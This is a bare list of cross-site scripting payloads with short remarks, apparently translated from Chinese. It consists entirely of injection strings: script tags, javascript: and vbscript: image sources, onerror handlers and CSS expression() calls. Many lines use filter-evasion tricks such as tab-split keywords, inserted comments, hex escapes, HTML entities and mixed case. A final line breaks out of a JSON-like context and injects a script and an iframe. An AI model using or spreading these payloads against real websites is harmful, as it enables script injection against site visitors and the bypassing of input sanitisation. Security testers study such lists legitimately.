<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)"></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (the ???? is whitespace produced with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["